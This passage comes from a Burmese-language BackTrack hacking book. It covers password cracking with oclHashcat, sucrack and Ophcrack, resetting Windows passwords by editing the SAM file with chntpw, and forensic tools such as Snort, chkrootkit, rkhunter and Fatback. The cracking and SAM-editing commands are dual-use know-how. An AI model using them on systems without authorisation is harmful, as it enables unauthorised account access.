ထည္႕သြင္းေပးရပါမည္။ ထိ႕ု ေနာက္ attackfile ဟုေခၚေသာ Hash list တစ္ခုကိုပါ သတ္မွတ္ေပးရပါမည္။
ယခုအပိုင္းတြင္ NVIDIA CUDA- ကို ေထာက္ပံ့ေသာ Graphics Card ျဖင့္ OclHastcat ကိုအသံုးျပဳ၍
Password Hash တစ္ခုကို Attack ျပဳလုပ္ျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ ထို႕ေနာက္ Attack File ကိုသတ္မွတ္
ကာ Custom Option မ်ားကိုလည္း အသံုးျပဳခဲ့ၿပီး Password hash မ်ားကို Attack ျပဳလုပ္ရန္ Graphics
Card ၏ GPU ကို ခြင့္ျပဳခဲ့ပါသည္။
မ်က္ပြင့္စာေပ 283
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/passwords/oclhastcat+
./oclHashcat-plus64.bin –help
284 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 285
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ ထို႕ေနာက္ Special Character မ်ား၊ Uppercase Character မ်ား၊ Lowercase Character မ်ားႏွင့္
ကိန္းဂဏန္းမ်ားပါ၀င္ေသာ Custom Character Set တစ္ခုကိုသတ္မွတ္ၿပီး ၄င္းတို႕ကို အတူတကြ
ထည္႕သြင္းေပးရပါမည္။ ထိ႕ု ေနာက္ attackfile ဟုေခၚေသာ Hash list တစ္ခုကိုပါ သတ္မွတ္ေပးရပါမည္။
286 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 287
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
sucrack /pentest/passwords/wordlists/rockyou.txt
sucrack –w 2 –s –a /pentest/passwords/wordlists/rockyou.txt
288 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 10
BackTrack Forensics
BackTrack မႈခင္းေဗဒ
မ်က္ပြင့္စာေပ 289
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
Computer မႈခင္းပညာသည္ နည္းလမ္းမ်ားစြာအသံုးျပဳၿပီး ခြျဲ ခမ္းစိတ္ျဖာျခင္း၊ အေျဖထုတ္ျခင္းႏွင့္
ကြန္ပ်ဴတာႏွင့္ Digital Media မ်ားမွ ျဖစ္ႏိုင္ဖြယ္ရာ ရည္ရြယ္ခ်က္မ်ားျဖင့္ အခ်က္အလက္မ်ားရွာေဖြေဖာ္
ထုတ္ျခင္းလုပ္ငန္းစဥ္တစ္ခုျဖစ္ပါသည္။ ရရိွလာေသာ အေျဖမ်ားအရ တစ္ဦးတစ္ေယာက္အတြက္ အသံုး၀င္
ဖြယ္ရာရိွသည္႕ အခ်က္အလက္မ်ားကိုရယူျခင္းဟုေယဘုယ်အားျဖင့္ သတ္မွတ္ႏိုင္မည္ျဖစ္သည္။ ၄င္း
လုပ္ငန္းစဥ္မ်ားထဲတြင္ Password မ်ားရယူျခင္း၊ ကြန္ပ်ဴတာ စနစ္မ်ားခ်ိဳးေဖာက္ခံရမႈမ်ားကို ေလ့လာ ျခင္း
သို႕မဟုတ္ ထိုးေဖာက္ရန္ႀကိဳးစားျခင္း၊ Hard Disk မွ ဖ်က္ထားေသာ အခ်က္အလက္မ်ားကို ျပန္လည္
ရယူျခင္းတို႕ပါ၀င္ပါသည္။ ေနာက္ဆံုးအခန္းျဖစ္သည္႕ BackTrack Forensic (BackTrack မႈခင္းေဗဒ) တြင္
ထိုမႈခင္းေဗဒျဖင့္ သက္ဆိုင္ေစမည္႕ ေအာက္တြင္ေဖာ္ျပထားေသာ အပိုင္းမ်ားကို ေလ့လာရမည္ျဖစ္ပါ
သည္။ ၄င္းတို႕မွာ
290 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းတြင္ intrusion detection သို႕မဟုတ္ log analysis အတြက္ရည္ရြယ္၍ Snort Tool ကို
အသံုးျပဳပံုကို ေလ့လာၾကည္႕ၾကပါမည္။ Snort ကို Sourcefire မွ Develop ျပဳလုပ္ခဲ့ၿပီး Open Source Tool
တစ္ခုဟုလည္း ဆိုႏိုင္ပါသည္။ ၄င္းသည္ intrusion detection ျပဳလုပ္ျခင္းႏွင့္ intrusion prevention
ႏွစ္မ်ိဳးစလံုးတြင္အသံုးျပဳႏိုင္ပါသည္။ Snort ၏ အားသာခ်က္တစ္ခုမွာ Real Time တြင္ Network ၏ Traffic
မ်ားကို Analyze ျပဳလုပ္ႏိုင္ျခင္းႏွင့္ လံုၿခံဳေရးထိုးေဖာက္၀င္ေရာက္မႈတစ္ခုျဖစ္ေပၚလာခဲ့ပါက လွ်င္ျမန္စြာ
တံု႕ျပန္ေစႏိုင္ပါသည္။
Snort ကိုစတင္အသံုးျပဳၾကည္႕ၾကပါမည္။
မ်က္ပြင့္စာေပ 291
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
292 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
locate snort.conf
nano /etc/snort/snort.conf
မ်က္ပြင့္စာေပ 293
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 295
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
mkdir /sourcecode
cd /sourcecode
၃။ ထိ႕ု ေနာက္ gpgdir application ႏွင့္ Public key ကို Download ျပဳလုပ္ရန္အတြက္ Wget ကိုအသံုးျပဳ
ရပါမည္။
wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2
wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc
296 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၇။ ထိ႕ု ေနာက္ ေအာက္ပါ Command မ်ားကိုအသံုးျပဳျခင္းျဖင့္ gpgdir ကို Untar ျပဳလုပ္ၿပီး Install လည္း
ျပဳလုပ္ေပးရပါမည္။
cd gpgdir-1.9.5
./install.pl
မ်က္ပြင့္စာေပ 297
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
gpgdir
vi /root/.gpgdirrc
mkdir /encrypted_directory
298 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
gpgdir –e /encrypted_directory
gpgdir –d /encrypted_directory
မ်က္ပြင့္စာေပ 299
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Rootkit ကို Scan ျပဳလုပ္ရန္အတြက္ Virtual Machine ကို အသံုးျပဳ၍ Install ျပဳလုပ္ျခင္းျဖင့္ျဖစ္ေစ၊
Physical Access အားျဖင့္ ကြန္ပ်ဴတာတြင္ BackTrack 5 R3 DVD ကို Mount ျပဳလုပ္၍ Live ကဲ့သို႕
အသံုးျပဳျခင္းျဖင့္ျဖစ္ေစ အသံုးျပဳရပါမည္။
300 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/forensics/chkrootkit
./chkrootkit
ယခုအပိုင္းတြင္ chkrootkit ကိုအသံုးျပဳ၍ malware၊ Trojen မ်ားႏွင့္ Localhost ေပၚမွ rootkit မ်ား ရိွ၊မရိွ
စစ္ေဆးျခင္းကို ေဖာ္ျပခဲ့ပါသည္။ chkrootkit သည္ System ကို Attack ျပဳလုပ္ခံရျခင္း ရိွ၊မရိွ စစ္ေဆးႏိုင္
ရန္အသံုးျပဳေသာ အားေကာင္းေသာ Scanner တစ္ခုျဖစ္ပါသည္။ အကယ္၍ rootkit မ်ားကူးစက္ခံေနရ
သည္ဟု သံသယရိွေသာအခါတြင္ BackTrack ကို Live အေနျဖင့္ အသံုးျပဳကာ စစ္ေဆးႏိုင္သည္႕အတြက္
အသံုး၀င္ေသာ Tool တစ္ခုဟုလည္း ဆိုႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 301
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
rkhunter --check
302 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
--list : Perl module မ်ား၊ စစ္ေဆးႏိုင္ေသာ rootkit မ်ား၊ test မ်ား၏ စာရင္းကို
ေဖာ္ျပေပးမည္ျဖစ္သည္။
rkhunter --list
--sk : Test တစ္ခုစီကို ေမာင္းႏွင္ေနစဥ္တြင္ Enter Key ကို ႏိွပ္ျခင္းျဖင့္ ထုိ Test
ပ်က္ျပယ္သြားေစရန္ ျပဳလုပ္ႏိုင္ေသာ Option တစ္ခုျဖစ္ပါသည္။
rkhunter --check --sk
Terminal Window တြင္ rkhunter ဟုရိုက္ထည္႕ေသာအခါတြင္ Help File ကိုေဖာ္ျပေပး
မည္ျဖစ္သည္။
rkhunter
fdisk –l
မ်က္ပြင့္စာေပ 303
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
mkdir /fatback
mkdir /fatback/thumbdrivefiles
cd /fatback
304 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 305
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ls
cd thumbdrivefiles
ls
306 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Fatback သည္ Hard Disk ထဲမွ ဖိုင္မ်ားကိုလည္း Recover ျပဳလုပ္ေပးႏိုင္ပါသည္။ အကယ္၍ ျပဳလုပ္မည္႕
Hard Disk တြင္ Partation တစ္ခုထက္ပိုမို၍ ရိွေနပါက Fatback ကိုအသံုးျပဳ၍ Partation တစ္ပိုင္းစီကို
Recover ျပဳလုပ္ေပးရပါမည္။
မ်က္ပြင့္စာေပ 307
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၃။ ထုိဖိုင္ကို Download ျပဳလုပ္ၿပီးေနာက္တြင္ Ophcrack ကိုဖြင့္ကာ Main Menu မွ Tables တြင္ Click
ႏိွပ္ပါ။
308 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ ထို႕ေနာက္ File ရိွေသာ Folder ကုိေရြးခ်ယ္ပါ။ (Folder အတြင္းသို႕ Click မႏိွပ္ရပါ) ထို႕ေနာက္ Ok တြင္
Click ႏိွပ္ပါ။ ထိုအခါ Rainbow Table ကို Install ျပဳလုပ္ၿပီးျဖစ္ပါလိမ့္မည္။
၇။ ထိ႕ု ေနာက္ Windows Password ကို Recover ျပဳလုပ္မည္႕ Rainbow Table ကိုေရြးခ်ယ္ေပးရပါမည္။
အကယ္၍ Ophcrack ကိုပထမဆံုးအႀကိမ္အသံုးျပဳျခင္း သို႕မဟုတ္ Ophcrack တြင္ Table အသံုးျပဳထား
ျခင္းမရိွခဲ့ပါက အဆင့္ (၃ မွ ၅ အထိ) ေဖာ္ျပထားေသာ Table ကို Install ျပဳလုပ္ျခင္းကို ေရွးဦးစြာ
လုပ္ေဆာင္ေပးရပါမည္။
မ်က္ပြင့္စာေပ 309
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
fdisk –l
မ်က္ပြင့္စာေပ 311
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /target/windows/system32/config
ls –al
cd /pentest/passwords/chntpw
./chntpw –I /target/windows/system32/config/SAM
၇။ What to Do ? ဟူေသာ ဧရိယာအတြင္းတြင္ Option 1 ကို ေရြးခ်ယ္၍ User Password မ်ားကို ျပင္ဆင္
ရပါမည္။
312 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
fdisk –l
၂။ Hard Disk ကို Mount ျပဳလုပ္ၿပီးေနာက္ Mount Point ကဲ့သ႕ို Target ကိုသတ္မွတ္ေပးရပါမည္။
cd /target/windows/system32/config
ls –al
မ်က္ပြင့္စာေပ 313
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/passwords/chntpw
./chntpw –I /target/windows/system32/config
ls
cd
314 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Conclusion
နိဂံုး
မ်က္ပြင့္စာေပ 315
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Conclusion
ယခုစာအုပ္ပါအေၾကာင္းအရာမ်ားသည္ အဆင့္ျမင့္ Hacking စာအုပ္၏ ကနဦးေျခလွမ္းတစ္ခုျဖစ္ပါသည္။
Hacker ပညာသည္ထိုးေဖာက္ေက်ာ္လႊားရန္အတြက္သာမကဘဲ ထိုသို႕ထိုးေဖာက္၀င္ေရာက္မႈမ်ားကို
ေက်ာ္လႊားရန္ ႀကိဳးပမ္းမႈမ်ားကို ကာကြယ္ရန္လည္းအသံုးခ်ႏိုင္ပါသည္။ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ား
ကိုေလ့လာၿပီးေသာ မ်ိဳးဆက္သစ္လူငယ္မ်ားကို အမွာစကားတစ္ခုျဖင့္ နိဂံုးခ်ဳပ္လိုပါသည္။ ထိုအခ်က္မွာ
Hacking ပညာရပ္သည္ ထင္ေပၚေက်ာ္ေစာလိုမႈေၾကာင့္ေလ့လာရျခင္းမဟုတ္ပါ။ ကြန္ပ်ဴတာပညာကို
တစ္ဖက္ကမ္းေခတ္ကၽြမ္းက်င္တတ္ေျမာက္ၿပီး အနာဂါတ္တြင္ေပၚထြန္းလာသည္႕ နည္းပညာမ်ား၏ ကနဦး
ရင္းႏွီးျမဳပ္ႏွံမႈတစ္ခုသာျဖစ္ေသာေၾကာင့္ မသင့္တင့္မေလ်ာက္ပတ္ေသာ ဆိုစကားမ်ားကို ဆင္ျခင္ထိန္း
သိမ္းေစလိုပါသည္။ ဆက္လက္အႀကံျပဳလိုသည္မွာ တတ္ေျမာက္သမွ်ေသာ ပညာရပ္ျဖင့္ တင္းတိမ္ေရာင့္ရဲ
မေနဘဲ ဆက္လက္ေလ့လာၾကရန္ တိုက္တြန္းပါသည္။
Telecom Technology
316 မ်က္ပြင့္စာေပ